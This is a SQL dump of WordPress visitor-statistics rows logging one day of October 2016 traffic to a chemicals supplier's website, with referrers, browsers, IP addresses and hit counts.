INSERT INTO `wp_statistics_visitor` VALUES (10747, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '194.190.171.43', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10748, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '78.25.100.254', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10749, '2016-10-24', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwiFpdi9lvPPAhWI5SYKHSYUCtEQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.136593572,d.eWE', 'MSIE', 'Windows', '11.0', '', '134.223.116.153', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10750, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '92.255.202.29', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10751, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '176.213.141.62', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10752, '2016-10-24', 'https://www.miller-stephenson.com/', 'Firefox', 'Windows', '3.5.0', '', '195.154.225.25', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10753, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '81.222.85.62', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10754, '2016-10-24', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '50.37.37.95', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10755, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '125.209.235.168', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10756, '2016-10-24', 'https://www.miller-stephenson.com/', 'AppleWebKit', 'Windows', '537.36', '', '125.209.235.185', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10757, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.173.191.89', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10758, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '89.250.168.206', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10759, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '81.26.142.42', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10760, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.215.112.100', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10761, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '212.109.16.20', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10762, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.77.161.194', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10763, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.253.12.28', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10764, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '176.59.42.191', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10765, '2016-10-24', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.143', '', '24.225.211.131', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10766, '2016-10-24', 'https://www.google.nl/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0ahUKEwillPuqlfPPAhVJahoKHULwC_sQFghKMAQ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fkrytox-gpl-105%2F&usg=AFQjCNE7fDUZYvw1vi_-WJ_5lLxrv9GE4g', 'MSIE', 'Windows', '11.0', '', '212.178.113.34', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10767, '2016-10-24', 'https://www.google.co.za/', 'Chrome', 'Windows', '53.0.2785.143', '', '196.212.55.227', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10768, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '195.158.233.23', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10769, '2016-10-24', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '78.100.87.34', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10770, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.35.189.66', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10771, '2016-10-24', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.67.126.75', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10772, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.39.53.61', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10773, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '116.72.178.118', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10774, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '192.168.0.7', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10775, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '92.255.77.77', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10776, '2016-10-24', 'https://images.google.de/imgres?imgurl=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fwp-content%2Fuploads%2F2016%2F08%2FMS-122SE-Aerospace.jpg&imgrefurl=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fptfe-mold-release-agent%2F&h=2334&w=3500&tbnid=aAkLBIm-7jIFgM%3A&docid=70-Az7O4m4RGvM&itg=1&ei=e-kNWO6YI-GBgAbKhbLwDQ&tbm=isch&client=safari&iact=rc&uact=3&dur=4180&page=0&start=0&ndsp=51&ved=0ahUKEwiuwqe_pPPPAhXhAMAKHcqCDN4QMwgfKAEwAQ&bih=1112&biw=1920', 'Safari', 'Macintosh', '10.0', '', '92.226.133.37', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10777, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.83.154.174', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10778, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.79.27.82', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10779, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.167.150.24', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10780, '2016-10-24', 'https://www.google.ch/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwj87pr5pvPPAhUFXRoKHcznB_UQFggjMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Frelease-agents%2F&usg=AFQjCNHbwMDofHjUU2PB95SWZra5M3XNKA&bvm=bv.136593572,d.d2s', 'MSIE', 'Windows', '11.0', '', '10.210.112.226', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10781, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.146.203.100', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10782, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '92.101.253.131', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10783, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '46.0.2490.80', '', '178.32.218.13', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10784, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.18', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10785, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '46.0.2490.86', '', '203.217.242.130', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10786, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '176.97.36.1', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10787, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '83.174.209.143', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10788, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '124.106.133.11', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10789, '2016-10-24', 'https://ttsgco.blogfa.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '103.15.252.216', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10790, '2016-10-24', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiute6crPPPAhXCOiYKHXzGC0EQFgg6MAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fconformal-coatings%2F&usg=AFQjCNF6BrACSYYrQwxy3XIrHbh4DG7M6A', 'MSIE', 'Windows', '11.0', '', '131.92.242.114', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10791, '2016-10-24', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '24.63.154.108', '000', 1281, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10792, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '41.0.2272.96', '', '66.249.79.157', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10793, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '50.62.208.38', '000', 42, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10794, '2016-10-24', 'https://www.google.pl/', 'Chrome', 'Windows', '53.0.2785.143', '', '31.182.52.158', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10795, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '194.135.162.177', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10796, '2016-10-24', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.197', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10797, '2016-10-24', 'https://www.miller-stephenson.com', 'Opera Next', 'Windows', '36.0.2130.32', '', '46.119.127.129', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10798, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.190.114.60', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10799, '2016-10-24', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.198.30.185', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10800, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.26.235.228', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10801, '2016-10-24', 'https://www.google.com.ar/', 'Chrome', 'Windows', '53.0.2785.143', '', '184.168.224.134', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10802, '2016-10-24', 'https://www.miller-stephenson.com/product/krytox-vpf-1514/', 'Chrome', 'Windows', '53.0.2785.143', '', '184.168.224.35', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10803, '2016-10-24', 'https://www.miller-stephenson.com/product/krytox-vpf-1514/', 'Chrome', 'Windows', '53.0.2785.143', '', '184.168.224.32', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10804, '2016-10-24', 'https://www.miller-stephenson.com/product/krytox-vpf-1514/', 'Chrome', 'Windows', '53.0.2785.143', '', '184.168.224.135', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10805, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '34.0.1847.137', '', '172.241.143.140', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10806, '2016-10-24', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.154.104', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10807, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '34.0.1847.137', '', '192.99.147.201', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10808, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.78.107.104', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10809, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '18.58.7.128', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10810, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.230.154.201', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10811, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.107', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10812, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.121.223.127', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10813, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.173.12.186', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10814, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '87.103.170.164', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10815, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.94.2.34', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10816, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '81.1.135.220', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10817, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '213.174.5.47', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10818, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.162.38.161', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10819, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.71', '', '142.112.17.49', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10820, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '176.107.8.73', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10821, '2016-10-24', 'https://www.miller-stephenson.com', 'ZoomBot', 'Unknown', 'Unknown', '', '52.57.228.87', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10822, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '77.232.53.14', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10823, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.246.1.37', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10824, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '195.93.144.146', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10825, '2016-10-24', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '104.55.34.158', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10826, '2016-10-24', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '90.80.221.225', '000', 16, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10827, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '83.237.14.183', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10828, '2016-10-24', 'https://www.miller-stephenson.com/product/ms-381h/', 'Safari', 'iPhone', '7.0', '', '65.55.210.161', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10829, '2016-10-24', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '82.114.82.90', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10830, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.25.229.41', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10831, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '83.136.247.2', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10832, '2016-10-24', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '7.0', '', '131.253.25.197', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10833, '2016-10-24', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwi99Mbfv_PPAhXFFj4KHU2oBJAQFghIMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct-tag%2Fks-1220%2F&usg=AFQjCNFdrPbZLroDr6c1HNZcbp7yQjxPbg&bvm=bv.136593572,d.cWw', 'MSIE', 'Windows', '11.0', '', '24.63.154.108', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10834, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '194.226.155.25', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10835, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '32.217.39.80', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10836, '2016-10-24', 'https://www.google.ca/', 'Firefox', 'Windows', '49.0', '', '72.142.18.182', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10837, '2016-10-24', 'https://www.google.gr/', 'Chrome', 'Windows', '53.0.2785.143', '', '62.38.51.195', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10838, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.163.164.14', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10839, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '68.193.188.205', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10840, '2016-10-24', 'https://www.miller-stephenson.com/product/epon-828/', 'MSIE', 'Windows', '11.0', '', '134.223.116.157', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10841, '2016-10-24', 'https://www.google.de/url?sa=t&rct=j&q=&esrc=s&frm=1&source=web&cd=8&cad=rja&uact=8&ved=0ahUKEwjhlp7vwfPPAhWI_ywKHbKsAb0QFghUMAc&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fkrytox-gpl-100%2F&usg=AFQjCNHPJSNGJ7C9DJ0T2ATyYgDAnAeKPA&sig2=8YfxFt0LXz878SKzIh3_sQ&bvm=bv.136593572,d.bGg', 'MSIE', 'Windows', '10.0', '', '194.120.84.9', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10842, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '78.85.73.227', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10843, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '194.135.215.138', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10844, '2016-10-24', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&frm=1&source=web&cd=2&ved=0ahUKEwiD7aqjw_PPAhXGaD4KHZ-QAhQQFgguMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fepon-815c%2F&usg=AFQjCNGBhFPZy83Wvi4ze28ZHEHlBywcdA', 'MSIE', 'Windows', '10.0', '', '24.97.120.186', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10845, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.57.18', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10846, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.48.13', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10847, '2016-10-24', 'https://www.google.com/', 'Chrome', 'Windows', '49.0.2623.112', '', '173.161.42.177', '000', 25, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10848, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '62.183.22.132', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10849, '2016-10-24', 'https://www.bing.com/search?q=ms-122AD&src=IE-TopResult&FORM=IETR02&conversationid=', 'MSIE', 'Windows', '11.0', '', '141.189.251.16', '000', 29, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10850, '2016-10-24', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '141.189.251.16', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10851, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '62.192.246.55', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10852, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.44.173.56', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10853, '2016-10-24', 'https://www.mschem.com/miller/index.php', 'Chrome', 'Windows', '53.0.2785.143', '', '50.151.36.144', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10854, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '18.0', '', '217.69.133.169', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10855, '2016-10-24', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '50.204.228.34', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10856, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '6.0.2', '', '180.76.15.140', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10857, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '6.0.2', '', '180.76.15.157', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10858, '2016-10-24', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '63.243.252.53', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10859, '2016-10-24', 'https://www.miller-stephenson.com', 'Mechanize', 'Unknown', '2.7.2', '', '52.13.61.203', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10860, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '78.106.144.112', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10861, '2016-10-24', 'https://www.miller-stephenson.com/', 'Opera Next', 'Windows', '26.0.1656.60', '', '46.166.141.89', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10862, '2016-10-24', 'https://www.miller-stephenson.com/', 'Opera Next', 'Windows', '26.0.1656.60', '', '191.96.251.124', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10863, '2016-10-24', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '191.96.251.124', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10864, '2016-10-24', 'https://www.bing.com/search?q=miller-stephenson&form=IE11TR&src=IE11TR&pc=DCJB', 'MSIE', 'Windows', '11.0', '', '173.248.54.2', '000', 43, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10865, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '77.123.53.160', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10866, '2016-10-24', 'https://www.miller-stephenson.com', 'AppleWebKit', 'Macintosh', '602.1.50', '', '71.47.1.198', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10867, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '49.0.2623.112', '', '173.81.238.39', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10868, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '31.0', '', '121.200.54.98', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10869, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '79.134.218.114', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10870, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.194.107.25', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10871, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '10.224.206.18', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10872, '2016-10-24', 'https://ttsgco.blogfa.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '213.207.237.246', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10873, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '195.190.118.6', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10874, '2016-10-24', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.194', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10875, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '81.211.68.90', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10876, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '87.255.14.81', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10877, '2016-10-24', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '76.208.102.51', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10878, '2016-10-24', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '75.68.134.96', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10879, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '79.107.140.143', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10880, '2016-10-24', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '66.55.20.19', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10881, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '93.94.234.154', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10882, '2016-10-24', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '62.38.51.195', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10883, '2016-10-24', 'https://www.google.it/', 'Chrome', 'Windows', '53.0.2785.143', '', '193.169.150.98', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10884, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.147.193.149', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10885, '2016-10-24', 'https://www.google.com.tw/', 'Chrome', 'Windows', '56.0.2899.0', '', '114.33.69.239', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10886, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.46.153.167', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10887, '2016-10-24', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '65.112.10.110', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10888, '2016-10-24', 'https://www.miller-stephenson.com', 'Apache-HttpClient', 'Unknown', '4.2.5', '', '140.237.0.234', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10889, '2016-10-24', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '81.26.130.6', '000', 2, 0); 
